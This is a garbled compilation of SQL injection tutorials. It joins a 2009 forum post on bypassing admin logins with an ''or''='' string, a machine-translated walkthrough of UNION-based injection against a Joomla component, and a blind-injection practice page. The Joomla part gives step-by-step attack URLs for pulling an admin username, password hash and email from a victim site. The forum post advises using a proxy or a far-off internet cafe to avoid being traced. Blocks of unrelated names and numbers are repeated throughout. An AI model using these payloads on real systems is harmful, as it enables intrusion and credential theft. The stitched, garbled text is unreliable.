Hacking Websites using Sql Injection statement

Focus to SQL Injection

Moderators: 4L13N, Moderator, Contributor SQL Injection

Post a reply 3 posts • Page 1 of 1

Hacking Websites using Sql Injection statement
by dj.topan »Mon Dec 21, 2009 4:22 pm

SQL (Structured Query Language) is a language that is used for accessing data in
relational databases. This language is a de facto standard language used in relational
database management. At present almost all the existing database server supports this
language to make its data management.

This time I wanted to give a little guidance on how to hack websites using a simple sql
injection, with no software and only use the statement "or".
In this way, someone who called himself as xnuxer never deface the Commission website

As we know, almost every website meliki special pages that can only be entered by the
administrator. And every person who entered into the directory must enter a username
and password as admin, and with tutors, we are trying to membye-pass the password.

Okay not to extend the preamble, we just go on topic. . Consider me the following
explanation: Suppose I have a website and to be able to configure, then I should go in as
admin. And anggep aja usernamenya is Admin, with a striped cat and password to log in,
then think - think sql statemennya as follows:
Nowhere select * from admin username = 'Administrator' and Password = 'cat Striped'

If I go into the root admin and fill in the username and password, automatically and
surely I can "ngutak work on" my website. But what if i do not know the password? This
never die, the core of the tutors this time, where we try membyepass or passing orders
without knowing the password is password.

Before that, I need a little explaining about the use of logic statement "or" where the
statement can be flipped value of "false" to "true" so that, even though we were wrong to
enter a password, still considered correct. For example, I use the statement or to sign in as
admin, then the statement that my input is to fill in "or''= '(without the quotation marks at
the beginning and end) on the username and password. Only by including such statement,
I can go to my website without needing to know what your username and password, and
please you to improvise to find the root admin page on a website. Or look at my previous
posts. And good luck

* Glosarry:
Statement in this tutorial, synonymous with a command or command.
Note: Again I remind you to use a proxy or at least do not do it in a place where your
regular browsing (home, office) or your internet cafe already know, better looking
Tini
agus agus Lilik sold sold sold nunus havid
Haris Haris havid glass plates sold
suskandani Siswanto
10000000000000000000000000000000
glass dishes agus nunu suskandani Widi
Yanti dias dreamily excommunicated person
team of people hostile to their people
10000000000000000000000000000000000
0
Agus bin wardi
silvi bin wardi
Tini bin sariman

internet cafe you never visit the .. klo can search dipelosok

DOWNLOAD
http://www.ziddu.com/download/954555...ments.rar.htmldj.topan
Member

Posts: 6
Joined: Sun Dec 20, 2009 6:08 pm
Location: SQL Injection
E-mail dj.topanWebsiteYIM Top
-------------------------------------------------- ------------------------------

Re: Website Hacking using Sql Injection statement

by ali »Mon Dec 21, 2009 5:57 pm

love examples dunk om?? hello

Agus wardi warni

Silvi warni
Wardi
Tini wardi
ali
Class 1

Posts: 128
Joined: Tue April 28, 2009 3:47 pm
YIM Top
-------------------------------------------------- ------------------------------

Re: Website Hacking using Sql Injection statement

by vampire »Tue Dec 22, 2009 12:49 pm

n example of a screen cutnya ad ga om

vampire
Class 1

Posts: 101
Joined: Sat March 22, 2008 10:04 pm
WebsiteYIM

Implementation of SQL Injection in Joomla

Line Break
Author: Admin (231 Articles)
Providing learning to you about Web Development, Graphic Design, etc, for free.
Starting from a hobby for knowledge sharing web development in 2007 by 2 students.
Contact:
Homepage: http://www.ilmuwebsite.com
Want to become a writer of articles in ilmuwebsite? Click>> List
What if Admin lazy to update its web? What will happen if the admin does not consider
the existing security risk? What if 'the choosen one' was an admin who does not know
anything about a data security system? Irony indeed. In fact, sometimes there is an
underestimate admin security system. What will happen if your server has a default
configuration? What will happen, what would happen? And the myriad consequences of
the merger of these two words. What happens is that an attacker the opportunity to
infiltrate into your website the more possible, rummaging through your server, even
sometimes an attacker to take profit from the exploitation of the existing system. In many
ways, including a wash dollar illicit manner. As performed by the carder.

The author will explain how easy a website capitalize exploited only with the internet and
internet browser of course, and little knowledge of sql queries. Need authors explain, the
author is just an ordinary human being who has a minimum knowledge of data security
systems.

Yes, just recently, one of the components joomla proved dangerous diseases, malignant
tumors that will spread throughout the body, and ultimately fatal. ~ ~

Sql injection bugs have been found in com_ds-syndicate, this is one example of the many
fatal bugs contained in joomla. Beware! Errors occur because the components do not
provide strict filtering in variable sql feed_id. Infiltration can be done, this simply
happened because of variable feed_id error. And while writing this article there are some
sites still have a disability like this.

Yes, Jump aja ...

http:// korban.com/index2.php? option = ds-syndicate & version = 1 & feed_id = 1

This url displays feeds as usual, but different as if we test his weaknesses, with the
addition of quotation marks (') behind him.

http:// korban.com/index2.php? option = ds-syndicate & version = 1 & feed_id = 1 '

andi agus wardi

sariman
What happened? ... Error ...

The next step is to search for the sequence table 'dssyndicate_feeds' to get the same form
of error, and stopped when I get a different error:
index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + order + by +1 / * ->
same error
index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + order + by +2 / * ->
same error
index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + order + by +3 / * ->
same error
index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + order + by +4 / * ->
same error
index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + order + by +20 / * ->
same error
...
index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + order + by +21 / * ->
different error

note the different forms of his error when feed_id filled with 1 + order + by +21 / *, this
is the benchmark for the next sql injection.

The next step is the use of union, more details on the functions union, please read here.

Furthermore, we test, whether the union function can be run on the url victims.
index2.php? option = ds-syndicate & version = 1 & feed_id = 1 + union + all + select
+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20 + from + wc_users

See the most recent of these lines,

from + wc_users

wc_users is a table that is retrieved from the database structure of joomla. Contains the
user's login information.
While this 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 obtained based writer who
has been mentioned earlier.

Yes after the url above on enter, you need to do is download the file,

After that open the newly downloaded files with an editor like notepad, even though the
xml file, but the authors still recommend to open it with notepad, not with the internet
browser, because it allows for the reading of the results of the sql injection has been
performed.
Adenan mbos
mbok yem
Ita antong sariman
wardi warni

See figure 2 in <title> tags:

<title> 2 (18) </ title>

Do not mind the number (18) behind him, to note is his number 2. This means that based
on union query results using this browser, you can use these numbers for the next 2. Like
changing the number 2 with another character set to use it like seeing the mysql version
that is used, you just go ahead, we will try to see the mysql version that is used by the
victim. Use this url ...

Adenan mbos
mbok yem
Ita antong sariman
wardi warni
http://korban.com/hack/joomla/index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,
@ @ Version, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 + from
+ Wc_users

note the number 2 is replaced with the phrase @ @ version, enter, then reopen the file
has been downloaded in notepad, what happened? title changed to the mysql version, the
authors found:

<title> 5.0.33 (18) </ title>

Mysql version 5.0.33, up here you have a database user can freely explore. What does an
attacker's next? yes, get the admin username and password. .

Capture username and password using sql injection forcibly This can be done
individually, or all at once. Query to display the username using sql injection bugs on this
one, you simply replace the @ @ version, which had been with the username field that
stores information of course, use this url:

http://korban.com/hack/joomla/index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,
username, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 + from + wc_users

run the url, download the file, then reopen with a notepad. The result is the username of
the database ...

<title> admin (18) </ title>

Or it could also displayed information on usernames, passwords, emails, and user_type

once, use the url like this:

http://korban.com/hack/joomla/index2.php?option=ds-
syndicate&version=1&feed_id=1+union+all+select+1,
concat (username, 0 × 3a, password, 0 × 3a, email, 0 × 3a, usertype), 3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 + from + wc_users

note, string username, replaced by concat (username, 0 × 3a, password, 0 × 3a, email, 0 ×
3a, usertype), concat use mengconvert here is a hex, or special characters into ascii form,
so, what happens later are:
0 × 3a changed to a colon (:), reopen the file results from the url above. The authors get is
information like this:

admin: bd3ca378488e00055d5b23df1252e443: EbnV8pXgTqIgApjK:

alkemail@gmail.com: Super Administrators

If the sort:
Username: admin
Password (hash): bd3ca378488e00055d5b23df1252e443: EbnV8pXgTqIgApjK
Email: alkemail@gmail.com
User type: Super Administrators

That in doing next is to try to crack a password, because it is still in the form of hash, in
other words that are still encrypted passwords. . Yups, decision by force username and
password has happened, her attacker returned to find a way how to get the original
password, how to crack the password hash with those.

Tini
agus agus Lilik sold sold sold nunus havid
Haris Haris havid glass plates sold
suskandani Siswanto
10000000000000000000000000000000
glass dishes agus nunu suskandani Widi
Yanti dias dreamily excommunicated person
team of people hostile to their people
10000000000000000000000000000000000
0
This is proof of a web so easily taken over by the attacker, the result of a lazy admin to
patch the systems in place.

In the next article the author would run a simple concept for joomla crack passwords
using php. Wait a sequel ....

For experimental purposes, please download the file here.

http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-
Full_Package.zip
http://www.unair.info/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz

greetz: b_scorpio cement business, which the staff ilmuwebsite ngurus thesis
Peterpanz the inconvenience ngurus thesis also, mr.freeman, for jojo too, Najwa [at]
STSN, dr.emi, Denice the manace, Phii_ FadliHow to exploit the SQL Injection Attack
Exploiting an SQL Inject attack involves solving a puzzle that is a cross between
Hangman and 20 Questions. It needs a little understanding of SQL and a great deal of
cunning.

Try your Hacking skills against this test system. It takes you through the exploit step-by-
step.

The SQL Injection attack allows external users to read details from the database. In a well
designed system this will only include data that is available to the public anyway. In a
poorly designed system this may allow external users to discover other users' passwords.

Try these steps:

To gain access and find a user name. Enter the string as both user name and password in
the frame on the right. This should get you logged in as a user (jake happens to be the
first user in the table). This tells you that Jake is a user and it allows you to access his
account - but it does not tell you his password.
Find out if Jake's password includes the letter "w". Enter xxx as user name and enter the
following string as the password: ' OR EXISTS(SELECT * FROM users WHERE
name='jake' AND password LIKE '%w%') AND ''='
Find out if Jake's password has "w" as the third letter. Enter xxx as user name and enter
the following string as the password: ' OR EXISTS(SELECT * FROM users WHERE
name='jake' AND password LIKE '__w%') AND ''='
Diagnosis

In which we explain how to identify a web site that may be vulnerable to an SQL
Injection attack.
Causes and Cures for SQL Injection Vulnerability
Explains the programming error that gives rise to the problem.
Exploit: Gain unauthorized Access
In which we explain how to get past a login screen without knowing a user name or a
password.
Exploit: Find a password.
In which we explain how to discover the password for a user if you know the name of the
password table and a user account.
Exploit: Find a user account.
In which we explain how to discover the user names in the password table given that we
know the name of the password table.
Exploit: Find the names of the tables.
In which we discover the names of the tables available for viewing. this might include the
name of the password table.
WARNING: In many countries (including UK) it is illegal to use this attack. I've set up a
vulnerable test system here so that you can have a go. I promise not to prosecute.

Up to 6 months in jail for unauthorised access

Up to 5 years if with intent to commit further offences
--------------------------------------------------------------------------------

Bragging Board If you can figure out a username and password combination then you can
brag about it here"

Note that phpBB is NOT vulnerable to an SQL

Injection attack. But to use this one you

Tini
agus agus Lilik sold sold sold nunus havid
Haris Haris havid glass plates sold
suskandani Siswanto
10000000000000000000000000000000
glass dishes agus nunu suskandani Widi
Yanti dias dreamily excommunicated person
team of people hostile to their people
10000000000000000000000000000000000
0
Tini
agus agus Lilik sold sold sold nunus havid
Haris Haris havid glass plates sold
suskandani Siswanto
10000000000000000000000000000000
glass dishes agus nunu suskandani Widi
Yanti dias dreamily excommunicated person
team of people hostile to their people
10000000000000000000000000000000000
0
Tini
agus agus Lilik sold sold sold nunus havid
Haris Haris havid glass plates sold
suskandani Siswanto
10000000000000000000000000000000
glass dishes agus nunu suskandani Widi
Yanti dias dreamily excommunicated person
team of people hostile to their people
10000000000000000000000000000000000
0